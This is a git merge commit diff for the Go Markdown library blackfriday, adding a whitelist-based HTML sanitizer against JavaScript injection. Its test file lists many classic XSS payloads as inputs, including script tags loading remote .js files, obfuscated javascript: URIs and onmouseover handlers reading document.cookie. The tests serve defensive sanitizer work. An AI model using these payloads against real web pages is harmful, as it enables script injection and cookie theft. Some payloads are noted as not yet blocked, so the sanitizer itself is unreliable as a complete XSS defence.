Merge pull request #50 from rtfb/master

Better protection against JavaScript injection
This commit is contained in:
Vytautas Šaltenis 2014-03-30 19:52:13 +03:00
commit d643453f1e
5 changed files with 228 additions and 48 deletions

View File

@ -89,6 +89,11 @@ All features of upskirt are supported, including:
known inputs that make it crash. If you find one, please let me known inputs that make it crash. If you find one, please let me
know and send me the input that does it. know and send me the input that does it.
NOTE: "safety" in this context means *runtime safety only*. It is
not bullet proof against JavaScript injections, though we're working
on it (https://github.com/russross/blackfriday/issues/11 tracks the
progress).
* **Fast processing**. It is fast enough to render on-demand in * **Fast processing**. It is fast enough to render on-demand in
most web applications without having to cache the output. most web applications without having to cache the output.

150
html.go
View File

@ -18,6 +18,7 @@ package blackfriday
import ( import (
"bytes" "bytes"
"fmt" "fmt"
"regexp"
"strconv" "strconv"
"strings" "strings"
) )
@ -28,7 +29,7 @@ const (
HTML_SKIP_STYLE // skip embedded <style> elements HTML_SKIP_STYLE // skip embedded <style> elements
HTML_SKIP_IMAGES // skip embedded images HTML_SKIP_IMAGES // skip embedded images
HTML_SKIP_LINKS // skip all links HTML_SKIP_LINKS // skip all links
HTML_SKIP_SCRIPT // skip embedded <script> elements HTML_SANITIZE_OUTPUT // strip output of everything that's not known to be safe
HTML_SAFELINK // only link to trusted protocols HTML_SAFELINK // only link to trusted protocols
HTML_NOFOLLOW_LINKS // only link with rel="nofollow" HTML_NOFOLLOW_LINKS // only link with rel="nofollow"
HTML_TOC // generate a table of contents HTML_TOC // generate a table of contents
@ -41,6 +42,41 @@ const (
HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS) HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS)
) )
var (
tags = []string{
"b",
"blockquote",
"code",
"del",
"dd",
"dl",
"dt",
"em",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"i",
"kbd",
"li",
"ol",
"p",
"pre",
"s",
"sup",
"sub",
"strong",
"strike",
"ul",
}
urlRe = `((https?|ftp):\/\/|\/)[-A-Za-z0-9+&@#\/%?=~_|!:,.;\(\)]+`
tagWhitelist = regexp.MustCompile(`^(<\/?(` + strings.Join(tags, "|") + `)>|<(br|hr)\s?\/?>)$`)
anchorClean = regexp.MustCompile(`^(<a\shref="` + urlRe + `"(\stitle="[^"<>]+")?\s?>|<\/a>)$`)
imgClean = regexp.MustCompile(`^(<img\ssrc="` + urlRe + `"(\swidth="\d{1,3}")?(\sheight="\d{1,3}")?(\salt="[^"<>]*")?(\stitle="[^"<>]*")?\s?\/?>)$`)
)
// Html is a type that implements the Renderer interface for HTML output. // Html is a type that implements the Renderer interface for HTML output.
// //
// Do not create this directly, instead use the HtmlRenderer function. // Do not create this directly, instead use the HtmlRenderer function.
@ -138,6 +174,10 @@ func attrEscape(out *bytes.Buffer, src []byte) {
} }
} }
func (options *Html) GetFlags() int {
return options.flags
}
func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) { func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) {
marker := out.Len() marker := out.Len()
doubleSpace(out) doubleSpace(out)
@ -169,32 +209,10 @@ func (options *Html) BlockHtml(out *bytes.Buffer, text []byte) {
} }
doubleSpace(out) doubleSpace(out)
if options.flags&HTML_SKIP_SCRIPT != 0 {
out.Write(stripTag(string(text), "script", "p"))
} else {
out.Write(text) out.Write(text)
}
out.WriteByte('\n') out.WriteByte('\n')
} }
func stripTag(text, tag, newTag string) []byte {
closeNewTag := fmt.Sprintf("</%s>", newTag)
i := 0
for i < len(text) && text[i] != '<' {
i++
}
if i == len(text) {
return []byte(text)
}
found, end := findHtmlTagPos([]byte(text[i:]), tag)
closeTag := fmt.Sprintf("</%s>", tag)
noOpen := text
if found {
noOpen = text[0:i+1] + newTag + text[end:]
}
return []byte(strings.Replace(noOpen, closeTag, closeNewTag, -1))
}
func (options *Html) HRule(out *bytes.Buffer) { func (options *Html) HRule(out *bytes.Buffer) {
doubleSpace(out) doubleSpace(out)
out.WriteString("<hr") out.WriteString("<hr")
@ -522,9 +540,6 @@ func (options *Html) RawHtmlTag(out *bytes.Buffer, text []byte) {
if options.flags&HTML_SKIP_IMAGES != 0 && isHtmlTag(text, "img") { if options.flags&HTML_SKIP_IMAGES != 0 && isHtmlTag(text, "img") {
return return
} }
if options.flags&HTML_SKIP_SCRIPT != 0 && isHtmlTag(text, "script") {
return
}
out.Write(text) out.Write(text)
} }
@ -726,6 +741,29 @@ func isHtmlTag(tag []byte, tagname string) bool {
return found return found
} }
// Look for a character, but ignore it when it's in any kind of quotes, it
// might be JavaScript
func skipUntilCharIgnoreQuotes(html []byte, start int, char byte) int {
inSingleQuote := false
inDoubleQuote := false
inGraveQuote := false
i := start
for i < len(html) {
switch {
case html[i] == char && !inSingleQuote && !inDoubleQuote && !inGraveQuote:
return i
case html[i] == '\'':
inSingleQuote = !inSingleQuote
case html[i] == '"':
inDoubleQuote = !inDoubleQuote
case html[i] == '`':
inGraveQuote = !inGraveQuote
}
i++
}
return start
}
func findHtmlTagPos(tag []byte, tagname string) (bool, int) { func findHtmlTagPos(tag []byte, tagname string) (bool, int) {
i := 0 i := 0
if i < len(tag) && tag[0] != '<' { if i < len(tag) && tag[0] != '<' {
@ -754,28 +792,54 @@ func findHtmlTagPos(tag []byte, tagname string) (bool, int) {
return false, -1 return false, -1
} }
// Now look for closing '>', but ignore it when it's in any kind of quotes, rightAngle := skipUntilCharIgnoreQuotes(tag, i, '>')
// it might be JavaScript if rightAngle > i {
inSingleQuote := false return true, rightAngle
inDoubleQuote := false
inGraveQuote := false
for i < len(tag) {
switch {
case tag[i] == '>' && !inSingleQuote && !inDoubleQuote && !inGraveQuote:
return true, i
case tag[i] == '\'':
inSingleQuote = !inSingleQuote
case tag[i] == '"':
inDoubleQuote = !inDoubleQuote
case tag[i] == '`':
inGraveQuote = !inGraveQuote
}
i++
} }
return false, -1 return false, -1
} }
func sanitizeHtml(html []byte) []byte {
var result []byte
for string(html) != "" {
skip, tag, rest := findHtmlTag(html)
html = rest
result = append(result, skip...)
result = append(result, sanitizeTag(tag)...)
}
return append(result, []byte("\n")...)
}
func sanitizeTag(tag []byte) []byte {
if tagWhitelist.Match(tag) || anchorClean.Match(tag) || imgClean.Match(tag) {
return tag
} else {
return []byte("")
}
}
func skipUntilChar(text []byte, start int, char byte) int {
i := start
for i < len(text) && text[i] != char {
i++
}
return i
}
func findHtmlTag(html []byte) (skip, tag, rest []byte) {
start := skipUntilChar(html, 0, '<')
rightAngle := skipUntilCharIgnoreQuotes(html, start, '>')
if rightAngle > start {
skip = html[0:start]
tag = html[start : rightAngle+1]
rest = html[rightAngle+1:]
return
}
return []byte(""), []byte(""), []byte("")
}
func skipSpace(tag []byte, i int) int { func skipSpace(tag []byte, i int) int {
for i < len(tag) && isspace(tag[i]) { for i < len(tag) && isspace(tag[i]) {
i++ i++

View File

@ -90,18 +90,119 @@ func TestRawHtmlTag(t *testing.T) {
"<p>alert()</p>\n", "<p>alert()</p>\n",
"<script>alert()</script>\n", "<script>alert()</script>\n",
"<p>alert()</p>\n", "alert()\n",
"<script src='foo'></script>\n", "<script src='foo'></script>\n",
"<p></p>\n", "\n",
"<script src='a>b'></script>\n",
"\n",
"zz <script src='foo'></script>\n", "zz <script src='foo'></script>\n",
"<p>zz </p>\n", "<p>zz </p>\n",
"zz <script src=foo></script>\n", "zz <script src=foo></script>\n",
"<p>zz </p>\n", "<p>zz </p>\n",
`<script><script src="http://example.com/exploit.js"></SCRIPT></script>`,
"\n",
`'';!--"<XSS>=&{()}`,
"<p>'';!--&quot;=&amp;{()}</p>\n",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<p></p>\n",
"<SCRIPT \nSRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<p></p>\n",
`<IMG SRC="javascript:alert('XSS');">`,
"<p></p>\n",
"<IMG SRC=javascript:alert('XSS')>",
"<p></p>\n",
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
"<p></p>\n",
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
"<p></p>\n",
`<a onmouseover="alert(document.cookie)">xss link</a>`,
"<p>xss link</a></p>\n",
"<a onmouseover=alert(document.cookie)>xss link</a>",
"<p>xss link</a></p>\n",
// XXX: this doesn't pass yet
//`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
//"<p></p>\n",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<p></p>\n",
`<IMG SRC=# onmouseover="alert('xxs')">`,
"<p></p>\n",
`<IMG SRC= onmouseover="alert('xxs')">`,
"<p></p>\n",
`<IMG onmouseover="alert('xxs')">`,
"<p></p>\n",
"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
"<p></p>\n",
"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
"<p></p>\n",
"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
"<p></p>\n",
`<IMG SRC="javascriptascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC="jav&#x09;ascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC="jav&#x0A;ascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`,
"<p></p>\n",
`<IMG SRC=" &#14; javascript:alert('XSS');">`,
"<p></p>\n",
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
"<p></p>\n",
// XXX: this doesn't pass yet
//"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
//"\n",
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
"<p></p>\n",
// XXX: this doesn't pass yet
//`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
//"",
"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
"<p></p>\n",
"<SCRIPT SRC=//ha.ckers.org/.j>",
"<p></p>\n",
// XXX: this doesn't pass yet
//`<IMG SRC="javascript:alert('XSS')"`,
//"",
// XXX: this doesn't pass yet
//"<iframe src=http://ha.ckers.org/scriptlet.html <",
//"",
} }
doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SKIP_SCRIPT) doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SANITIZE_OUTPUT)
} }
func TestEmphasis(t *testing.T) { func TestEmphasis(t *testing.T) {

View File

@ -34,6 +34,10 @@ func LatexRenderer(flags int) Renderer {
return &Latex{} return &Latex{}
} }
func (options *Latex) GetFlags() int {
return 0
}
// render code chunks using verbatim, or listings if we have a language // render code chunks using verbatim, or listings if we have a language
func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) { func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) {
if lang == "" { if lang == "" {

View File

@ -165,6 +165,8 @@ type Renderer interface {
// Header and footer // Header and footer
DocumentHeader(out *bytes.Buffer) DocumentHeader(out *bytes.Buffer)
DocumentFooter(out *bytes.Buffer) DocumentFooter(out *bytes.Buffer)
GetFlags() int
} }
// Callback functions for inline parsing. One such function is defined // Callback functions for inline parsing. One such function is defined
@ -231,7 +233,7 @@ func MarkdownCommon(input []byte) []byte {
htmlFlags |= HTML_USE_SMARTYPANTS htmlFlags |= HTML_USE_SMARTYPANTS
htmlFlags |= HTML_SMARTYPANTS_FRACTIONS htmlFlags |= HTML_SMARTYPANTS_FRACTIONS
htmlFlags |= HTML_SMARTYPANTS_LATEX_DASHES htmlFlags |= HTML_SMARTYPANTS_LATEX_DASHES
htmlFlags |= HTML_SKIP_SCRIPT htmlFlags |= HTML_SANITIZE_OUTPUT
renderer := HtmlRenderer(htmlFlags, "", "") renderer := HtmlRenderer(htmlFlags, "", "")
// set up the parser // set up the parser
@ -291,6 +293,10 @@ func Markdown(input []byte, renderer Renderer, extensions int) []byte {
first := firstPass(p, input) first := firstPass(p, input)
second := secondPass(p, first) second := secondPass(p, first)
if renderer.GetFlags()&HTML_SANITIZE_OUTPUT != 0 {
second = sanitizeHtml(second)
}
return second return second
} }